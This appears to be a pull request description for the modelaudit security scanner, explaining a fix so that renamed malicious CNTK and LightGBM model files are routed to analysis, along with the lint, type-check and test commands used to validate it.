- align direct detection, directory prefilter preservation, and nested ZIP dispatch with regression coverage for malicious positives and benign negatives

## Root Cause

CNTK and LightGBM each had strict bounded content recognizers, but scanner ownership and full routing still depended on filename suffixes. A malicious CNTKv2 payload renamed to `.jpg` was dropped during directory filtering, and a malicious LightGBM `.jpg` was retained only to end in an unscannable-format result rather than security analysis.

## Impact

Renamed malicious CNTK and LightGBM artifacts now reach their existing execution/network indicator checks in direct scans, directory scans, and nested ZIP members. Routing still requires the established strict signatures; partial markers and XGBoost-like content remain rejected.

## Validation

- `env -u UV_EXCLUDE_NEWER -u VIRTUAL_ENV uv --no-config run --locked ruff format modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `env -u UV_EXCLUDE_NEWER -u VIRTUAL_ENV uv --no-config run --locked ruff check --fix modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `env -u UV_EXCLUDE_NEWER -u VIRTUAL_ENV uv --no-config run --locked mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/`
- `env -u UV_EXCLUDE_NEWER -u VIRTUAL_ENV PROMPTFOO_DISABLE_TELEMETRY=1 uv --no-config run --locked pytest -n auto -m "not slow and not integration" --maxfail=1` (`4833 passed, 972 skipped`)
- focused routing slice: `456 passed`

## Stack

This PR is stacked on #1275 (`mdangelo/codex/fix-renamed-coreml-routing`) so its diff is limited to the CNTK/LightGBM routing repair.